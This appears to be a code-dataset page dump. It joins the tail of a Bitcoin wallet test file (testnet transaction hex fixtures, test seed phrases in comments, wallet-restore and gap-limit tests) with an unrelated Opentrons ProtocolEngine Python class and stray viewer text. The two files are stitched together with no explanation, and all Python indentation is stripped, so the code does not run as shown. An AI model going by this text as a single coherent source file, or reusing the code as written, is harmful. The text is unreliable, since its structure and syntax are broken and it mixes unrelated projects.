"6ae728f783b0d4680ed8050c05419f0a89dfd6e28d46acfce7453b4d1b2b0254": "0100000000010496941b9f18710b39bacde890e39a7fa401e6bf49985857cb7adfb8a45147ef1e000000001716001441aec99157d762708339d7faf7a63a8c479ed84cfdffffff96941b9f18710b39bacde890e39a7fa401e6bf49985857cb7adfb8a45147ef1e0100000000fdffffff1a5d1e4ca513983635b0df49fd4f515c66dd26d7bff045cfbd4773aa5d93197f000000006a4730440220652145460092ef42452437b942cb3f563bf15ad90d572d0b31d9f28449b7a8dd022052aae24f58b8f76bd2c9cf165cc98623f22870ccdbef1661b6dbe01c0ef9010f01210375b63dd8e93634bbf162d88b25d6110b5f5a9638f6fe080c85f8b21c2199a1fdfdffffff1a5d1e4ca513983635b0df49fd4f515c66dd26d7bff045cfbd4773aa5d93197f010000008a47304402207517c52b241e6638a84b05385e0b3df806478c2e444f671ca34921f6232ee2e70220624af63d357b83e3abe7cdf03d680705df0049ec02f02918ee371170e3b4a73d014104de408e142c00615294813233cdfe9e7774615ae25d18ba4a1e3b70420bb6666d711464518457f8b947034076038c6f0cfc8940d85d3de0386e0ad88614885c7cfdffffff0480969800000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac809698000000000017a914f2a76207d7b54bd34282281205923841341d9e1f87002d3101000000001976a914b8d4651937cd7db5bcf5fc98e6d2d8cfa131e85088ac743db20a00000000160014c7d0df09e03173170aed0247243874c6872748ed02483045022100b932cda0aeb029922e126568a48c05d79317747dcd77e61dce44e190e140822002202d13f84338bb272c531c4086277ac11e166c59612f4aefa6e20f78455bdc09970121028e6808a8ac1e9ede621aaabfcad6f86662dbe0ace0236f078eb23c24bc88bd5e02483045022100d74a253262e3898626c12361ba9bb5866f9303b42eec0a55ced0578829e2e61e022059c08e61d90cd63c84de61c796c9d1bc1e2f8217892a7c07b383af357ddd7a730121028641e89822127336fc12ff99b1089eb1a124847639a0e98d17ff03a135ad578b000020c71200",
"72419d187c61cfc67a011095566b374dc2c01f5397e36eafe68e40fc44474112": "0100000002677b2113f26697718c8991823ec0e637f08cb61426da8da508b97449c872490f000000008b4830450221009c50c0f56f34781dfa7b3d540ac724436c67ffdc2e5b2d5a395c9ebf72116ef802205a94a490ea14e4824f36f1658a384aeaecadd54839600141eb20375a49d476d1014104c291245c2ee3babb2a35c39389df56540867f93794215f743b9aa97f5ba114c4cdee8d49d877966728b76bc649bb349efd73adef1d77452a9aac26f8c51ae1ddfdffffff677b2113f26697718c8991823ec0e637f08cb61426da8da508b97449c872490f010000008b483045022100ae0b286493491732e7d3f91ab4ac4cebf8fe8a3397e979cb689e62d350fdcf2802206cf7adf8b29159dd797905351da23a5f6dab9b9dbf5028611e86ccef9ff9012e014104c62c4c4201d5c6597e5999f297427139003fdb82e97c2112e84452d1cfdef31f92dd95e00e4d31a6f5f9af0dadede7f6f4284b84144e912ff15531f36358bda7fdffffff019f7093030000000022002027ce908c4ee5f5b76b4722775f23e20c5474f459619b94040258290395b88afb6ec51200",
"76bcf540b27e75488d95913d0950624511900ae291a37247c22d996bb7cde0b4": "0100000001f4ba9948cdc4face8315c7f0819c76643e813093ffe9fbcf83d798523c7965db000000006a473044022061df431a168483d144d4cffe1c5e860c0a431c19fc56f313a899feb5296a677c02200208474cc1d11ad89b9bebec5ec00b1e0af0adaba0e8b7f28eed4aaf8d409afb0121039742bf6ab70f12f6353e9455da6ed88f028257950450139209b6030e89927997fdffffff01d4f84b00000000001976a9140b93db89b6bf67b5c2db3370b73d806f458b3d0488ac0a171300",
"7f19935daa7347bdcf45f0bfd726dd665c514ffd49dfb035369813a54c1e5d1a": "01000000000102681b6a8dd3a406ee10e4e4aece3c2e69f6680c02f53157be6374c5c98322823a00000000232200209adfa712053a06cc944237148bcefbc48b16eb1dbdc43d1377809bcef1bea9affdffffff681b6a8dd3a406ee10e4e4aece3c2e69f6680c02f53157be6374c5c98322823a0100000023220020f40ed2e3fbffd150e5b74f162c3ce5dae0dfeba008a7f0f8271cf1cf58bfb442fdffffff02801d2c04000000001976a9140cc01e19090785d629cdcc98316f328df554de4f88ac6d455d05000000001976a914b9e828990a8731af4527bcb6d0cddf8d5ffe90ce88ac040047304402206eb65bd302eefae24eea05781e8317503e68584067d35af028a377f0751bb55b0220226453d00db341a4373f1bcac2391f886d3a6e4c30dd15133d1438018d2aad24014730440220343e578591fab0236d28fb361582002180d82cb1ba79eec9139a7a9519fca4260220723784bd708b4a8ed17bb4b83a5fd2e667895078e80eec55119015beb3592fd2016952210222eca5665ed166d090a5241d9a1eb27a92f85f125aaf8df510b2b5f701f3f534210227bca514c22353a7ae15c61506522872afecf10df75e599aabe4d562d0834fce2103601d7d49bada5a57a4832eafe4d1f1096d7b0b051de4a29cd5fc8ad62865e0a553ae0400483045022100b15ea9daacd809eb4d783a1449b7eb33e2965d4229e1a698db10869299dddc670220128871ffd27037a3e9dac6748ce30c14b145dd7f9d56cc9dcde482461fb6882601483045022100cb659e1de65f8b87f64d1b9e62929a5d565bbd13f73a1e6e9dd5f4efa024b6560220667b13ce2e1a3af2afdcedbe83e2120a6e8341198a79efb855b8bc5f93b4729f0169522102d038600af253cf5019f9d5637ca86763eca6827ed7b2b7f8cc6326dffab5eb68210315cdb32b7267e9b366fb93efe29d29705da3db966e8c8feae0c8eb51a7cf48e82103f0335f730b9414acddad5b3ee405da53961796efd8c003e76e5cd306fcc8600c53ae1fc71200",
"9de08bcafc602a3d2270c46cbad1be0ef2e96930bec3944739089f960652e7cb": "010000000001013409c10fd732d9e4b3a9a1c4beb511fa5eb32bc51fd169102a21aa8519618f800000000000fdffffff0640420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac40420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac40420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac80841e00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac64064a000000000016001469825d422ca80f2a5438add92d741c7df45211f280969800000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac02483045022100b4369b18bccb74d72b6a38bd6db59122a9e8af3356890a5ecd84bdb8c7ffe317022076a5aa2b817be7b3637d179106fccebb91acbc34011343c8e8177acc2da4882e0121033c8112bbf60855f4c3ae489954500c4b8f3408665d8e1f63cf3216a76125c69865281300",
"a29d131e766950cae2e97dd4527b7c050293c2f5630470bdd7d00b7fe6db1b9d": "010000000400899af3606e93106a5d0f470e4e2e480dfc2fd56a7257a1f0f4d16fd5961a0f000000006a47304402205b32a834956da303f6d124e1626c7c48a30b8624e33f87a2ae04503c87946691022068aa7f936591fb4b3272046634cf526e4f8a018771c38aff2432a021eea243b70121034bb61618c932b948b9593d1b506092286d9eb70ea7814becef06c3dfcc277d67fdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753000000006b483045022100de775a580c6cb47061d5a00c6739033f468420c5719f9851f32c6992610abd3902204e6b296e812bb84a60c18c966f6166718922780e6344f243917d7840398eb3db0121025d7317c6910ad2ad3d29a748c7796ddf01e4a8bc5e3bf2a98032f0a20223e4aafdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753010000006a4730440220615a26f38bf6eb7043794c08fb81f273896b25783346332bec4de8dfaf7ed4d202201c2bc4515fc9b07ded5479d5be452c61ce785099f5e33715e9abd4dbec410e11012103caa46fcb1a6f2505bf66c17901320cc2378057c99e35f0630c41693e97ebb7cffdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753030000006b483045022100c8fba762dc50041ee3d5c7259c01763ed913063019eefec66678fb8603624faa02200727783ccbdbda8537a6201c63e30c0b2eb9afd0e26cb568d885e6151ef2a8540121027254a862a288cfd98853161f575c49ec0b38f79c3ef0bf1fb89986a3c36a8906fdffffff0240787d01000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac3bfc1502000000001976a914c30f2af6a79296b6531bf34dba14c8419be8fb7d88ac52c51200",
"c1433779c5faec5df5e7bdc51214a95f15deeab842c23efbdde3acf82c165462": "0100000003aabec9cb99096073ae47cfb84bfd5b0063ae7f157956fd37c5d1a79d74ee6e33000000008b4830450221008136fc880d5e24fdd9d2a43f5085f374fef013b814f625d44a8075104981d92a0220744526ec8fc7887c586968f22403f0180d54c9b7ff8db9b553a3c4497982e8250141047b8b4c91c5a93a1f2f171c619ca41770427aa07d6de5130c3ba23204b05510b3bd58b7a1b35b9c4409104cfe05e1677fc8b51c03eac98b206e5d6851b31d2368fdffffff16d23bdc750c7023c085a6fc76e3e468944919783535ea2c13826f181058a656010000008a47304402204148410f2d796b1bb976b83904167d28b65dcd7c21b3876022b4fa70abc86280022039ea474245c3dc8cd7e5a572a155df7a6a54496e50c73d9fed28e76a1cf998c00141044702781daed201e35aa07e74d7bda7069e487757a71e3334dc238144ad78819de4120d262e8488068e16c13eea6092e3ab2f729c13ef9a8c42136d6365820f7dfdffffff68091e76227e99b098ef8d6d5f7c1bb2a154dd49103b93d7b8d7408d49f07be0010000008b4830450221008228af51b61a4ee09f58b4a97f204a639c9c9d9787f79b2fc64ea54402c8547902201ed81fca828391d83df5fbd01a3fa5dd87168c455ed7451ba8ccb5bf06942c3b0141046fcdfab26ac08c827e68328dbbf417bbe7577a2baaa5acc29d3e33b3cc0c6366df34455a9f1754cb0952c48461f71ca296b379a574e33bcdbb5ed26bad31220bfdffffff0210791c00000000001976a914a4b991e7c72996c424fe0215f70be6aa7fcae22c88ac80c3c901000000001976a914b0f6e64ea993466f84050becc101062bb502b4e488ac7af31200",
"c2595a521111eb0298e183e0a74befc91f6f93b03e2f7d43c7ad63a9196f7e3a": "01000000018557003cb450f53922f63740f0f77db892ef27e15b2614b56309bfcee96a0ad3010000006a473044022041923c905ae4b5ed9a21aa94c60b7dbcb8176d58d1eb1506d9fb1e293b65ce01022015d6e9d2e696925c6ad46ce97cc23dec455defa6309b839abf979effc83b8b160121029332bf6bed07dcca4be8a5a9d60648526e205d60c75a21291bffcdefccafdac3fdffffff01c01c0f00000000001976a914a2185918aa1006f96ed47897b8fb620f28a1b09988ac01171300",
"e07bf0498d40d7b8d7933b1049dd54a1b21b7c5f6d8def98b0997e22761e0968": "01000000016d445091b7b4fa19cbbee30141071b2202d0c27d195b9d6d2bcc7085c9cd9127010000008b483045022100daf671b52393af79487667eddc92ebcc657e8ae743c387b25d1c1a2e19c7a4e7022015ef2a52ea7e94695de8898821f9da539815775516f18329896e5fc52a3563b30141041704a3daafaace77c8e6e54cf35ed27d0bf9bb8bcd54d1b955735ff63ec54fe82a80862d455c12e739108b345d585014bf6aa0cbd403817c89efa18b3c06d6b5fdffffff02144a4c00000000001976a9148942ac692ace81019176c4fb0ac408b18b49237f88ac404b4c00000000001976a914dd36d773acb68ac1041bc31b8a40ee504b164b2e88ace9ca1200",
"e453e7346693b507561691b5ea73f8eba60bfc8998056226df55b2fac88ba306": "010000000125af87b0c2ebb9539d644e97e6159ccb8e1aa80fe986d01f60d2f3f37f207ae8010000008b483045022100baed0747099f7b28a5624005d50adf1069120356ac68c471a56c511a5bf6972b022046fbf8ec6950a307c3c18ca32ad2955c559b0d9bbd9ec25b64f4806f78cadf770141041ea9afa5231dc4d65a2667789ebf6806829b6cf88bfe443228f95263730b7b70fb8b00b2b33777e168bcc7ad8e0afa5c7828842794ce3814c901e24193700f6cfdffffff02a0860100000000001976a914ade907333744c953140355ff60d341cedf7609fd88ac68830a00000000001976a9145d48feae4c97677e4ca7dcd73b0d9fd1399c962b88acc9cc1300",
"e87a207ff3f3d2601fd086e90fa81a8ecb9c15e6974e649d53b9ebc2b087af25": "01000000010db780fff7dfcef6dba9268ecf4f6df45a1a86b86cad6f59738a0ce29b145c47010000008a47304402202887ec6ec200e4e2b4178112633011cbdbc999e66d398b1ff3998e23f7c5541802204964bd07c0f18c48b7b9c00fbe34c7bc035efc479e21a4fa196027743f06095f0141044f1714ed25332bb2f74be169784577d0838aa66f2374f5d8cbbf216063626822d536411d13cbfcef1ff3cc1d58499578bc4a3c4a0be2e5184b2dd7963ef67713fdffffff02a0860100000000001600145bbdf3ba178f517d4812d286a40c436a9088076e6a0b0c00000000001976a9143fc16bef782f6856ff6638b1b99e4d3f863581d388acfbcb1300"
}
txid_list = sorted(list(transactions))
@classmethod
def create_old_wallet(cls):
ks = keystore.from_old_mpk('e9d4b7866dd1e91c862aebf62a49548c7dbf7bcc6e4b7b8c9da820c7737968df9c09d5a3e271dc814a29981f81b3faaf2737b551ef5dcc6189cf0f8252c442b3')
# seed words: powerful random nobody notice nothing important anyway look away hidden message over
w = WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=20)
# some txns are beyond gap limit:
w.create_new_address(for_change=True)
return w
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder1(self, mock_write):
w = self.create_old_wallet()
for i in [2, 12, 7, 9, 11, 10, 16, 6, 17, 1, 13, 15, 5, 8, 4, 0, 14, 18, 3]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder2(self, mock_write):
w = self.create_old_wallet()
for i in [9, 18, 2, 0, 13, 3, 1, 11, 4, 17, 7, 14, 12, 15, 10, 8, 5, 6, 16]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder3(self, mock_write):
w = self.create_old_wallet()
for i in [5, 8, 17, 0, 9, 10, 12, 3, 15, 18, 2, 11, 14, 7, 16, 1, 4, 6, 13]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
class TestWalletHistory_EvilGapLimit(TestCaseForTestnet):
transactions = {
# txn A:
"511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4": "010000000001018aacc3c8f98964232ebb74e379d8ff4e800991eecfcf64bd1793954f5e50a8790100000000fdffffff0340420f0000000000160014dbf321e905d544b54b86a2f3ed95b0ac66a3ddb0ff0514000000000016001474f1c130d3db22894efb3b7612b2c924628d0d7e80841e000000000016001488492707677190c073b6555fb08d37e91bbb75d802483045022100cf2904e09ea9d2670367eccc184d92fcb8a9b9c79a12e4efe81df161077945db02203530276a3401d944cf7a292e0660f36ee1df4a1c92c131d2c0d31d267d52524901210215f523a412a5262612e1a5ef9842dc864b0d73dc61fb4c6bfd480a867bebb1632e181400",
# txn B:
"fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f": "01000000000101a317998ac6cc717de17213804e1459900fe257b9f4a3b9b9edd29806728277530100000000fdffffff03c0c62d00000000001600149543301687b1ca2c67718d55fbe10413c73ddec200093d00000000001600141bc12094a4475dcfbf24f9920dafddf9104ca95b3e4a4c0000000000160014b226a59f2609aa7da4026fe2c231b5ae7be12ac302483045022100f1082386d2ce81612a3957e2801803938f6c0066d76cfbd853918d4119f396df022077d05a2b482b89707a8a600013cb08448cf211218a462f2a23c2c0d80a8a0ca7012103f4aac7e189de53d95e0cb2e45d3c0b2be18e93420734934c61a6a5ad88dd541033181400",
# txn C:
"268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656": "010000000001014f1bdc64da8056d08f79db7f5348d1de55946e57aa7c8279499c703889b6e0fd0100000000fdffffff0260e316000000000016001445e9879cf7cd5b4a15df7ddcaf5c6dca0e1508bacc242600000000001600141bc12094a4475dcfbf24f9920dafddf9104ca95b02483045022100ae3618912f341fefee11b67e0047c47c88c4fa031561c3fafe993259dd14d846022056fa0a5b5d8a65942fa68bcc2f848fd71fa455ba42bc2d421b67eb49ba62aa4e01210394d8f4f06c2ea9c569eb050c897737a7315e7f2104d9b536b49968cc89a1f11033181400",
}
@classmethod
def create_wallet(cls):
ks = keystore.from_xpub('vpub5Vhmk4dEJKanDTTw6immKXa3thw45u3gbd1rPYjREB6viP13sVTWcH6kvbR2YeLtGjradr6SFLVt9PxWDBSrvw1Dc1nmd3oko3m24CQbfaJ')
# seed words: nephew work weather maze pyramid employ check permit garment scene kiwi smooth
w = WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=20)
return w
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_wallet_txorder1(self, mock_write):
w = self.create_wallet()
w.storage.put('stored_height', 1316917 + 100)
for txid in self.transactions:
tx = Transaction(self.transactions[txid])
w.transactions[tx.txid()] = tx
# txn A is an external incoming txn paying to addr (3) and (15)
# txn B is an external incoming txn paying to addr (4) and (25)
# txn C is an internal transfer txn from addr (25) -- to -- (1) and (25)
w.receive_history_callback('tb1qgh5c088he4d559wl0hw27hrdeg8p2z96pefn4q', # HD index 1
[('268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656', 1316917)],
{})
w.synchronize()
w.receive_history_callback('tb1qm0ejr6g964zt2jux5te7m9ds43n28hdsdz9ull', # HD index 3
[('511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4', 1316912)],
{})
w.synchronize()
w.receive_history_callback('tb1qj4pnq958k89zcem3342lhcgyz0rnmhkzl6x0cl', # HD index 4
[('fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f', 1316917)],
{})
w.synchronize()
w.receive_history_callback('tb1q3pyjwpm8wxgvquak240mprfhaydmkawcsl25je', # HD index 15
[('511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4', 1316912)],
{})
w.synchronize()
w.receive_history_callback('tb1qr0qjp99ygawul0eylxfqmt7alygye22mj33vej', # HD index 25
[('fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f', 1316917),
('268fce617aaaa4847835c2212b984d7b7741fdab65de22813288341819bc5656', 1316917)],
{})
w.synchronize()
self.assertEqual(9999788, sum(w.get_balance()))
|
py | 1a38c94f4f0005e636c340b5f0855f393323f447 | """ProtocolEngine class definition."""
from __future__ import annotations
from typing import Union
from opentrons.hardware_control.api import API as HardwareAPI
from opentrons.util.helpers import utc_now
from .errors import ProtocolEngineError, UnexpectedProtocolError
from .execution import CommandHandlers
from .resources import ResourceProviders
from .state import StateStore, StateView
from .commands import (
CommandRequestType,
CompletedCommandType,
FailedCommandType,
)
class ProtocolEngine:
"""Main ProtocolEngine class.
A ProtocolEngine instance holds the state of a protocol as it executes,
and manages calls to a command executor that actually implements the logic
of the commands themselves.
"""
state_store: StateStore
_handlers: CommandHandlers
@classmethod
async def create(cls, hardware: HardwareAPI) -> ProtocolEngine:
"""Create a ProtocolEngine instance."""
resources = ResourceProviders.create()
# TODO(mc, 2020-11-18): check short trash FF
# TODO(mc, 2020-11-18): consider moving into a StateStore.create factory
deck_def = await resources.deck_data.get_deck_definition()
fixed_labware = await resources.deck_data.get_deck_fixed_labware(deck_def)
state_store = StateStore(
deck_definition=deck_def,
deck_fixed_labware=fixed_labware
)
handlers = CommandHandlers.create(
resources=resources,
hardware=hardware,
state=StateView.create_view(state_store),
)
return cls(state_store=state_store, handlers=handlers)
def __init__(
self,
state_store: StateStore,
handlers: CommandHandlers,
) -> None:
"""Initialize a ProtocolEngine instance.
This constructor does not inject provider implementations. Prefer the
ProtocolEngine.create factory classmethod.
"""
self.state_store = state_store
self._handlers = handlers
async def execute_command(
self,
request: CommandRequestType,
command_id: str,
) -> Union[CompletedCommandType, FailedCommandType]:
"""Execute a command request, waiting for it to complete."""
cmd_impl = request.get_implementation()
created_at = utc_now()
cmd = cmd_impl.create_command(created_at).to_running(created_at)
done_cmd: Union[CompletedCommandType, FailedCommandType]
# store the command prior to execution
self.state_store.handle_command(cmd, command_id=command_id)
# execute the command
try:
result = await cmd_impl.execute(self._handlers)
completed_at = utc_now()
done_cmd = cmd.to_completed(result, completed_at)
except Exception as error:
failed_at = utc_now()
if not isinstance(error, ProtocolEngineError):
error = UnexpectedProtocolError(error)
done_cmd = cmd.to_failed(error, failed_at)
# store the done command
self.state_store.handle_command(done_cmd, command_id=command_id)
return done_cmd
def add_command(self, request: CommandRequestType) -> None:
"""Add a command to ProtocolEngine."""
# TODO(spp, 2020-05-13):
# Generate a UUID to be used as command_id for each command added.
raise NotImplementedError
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.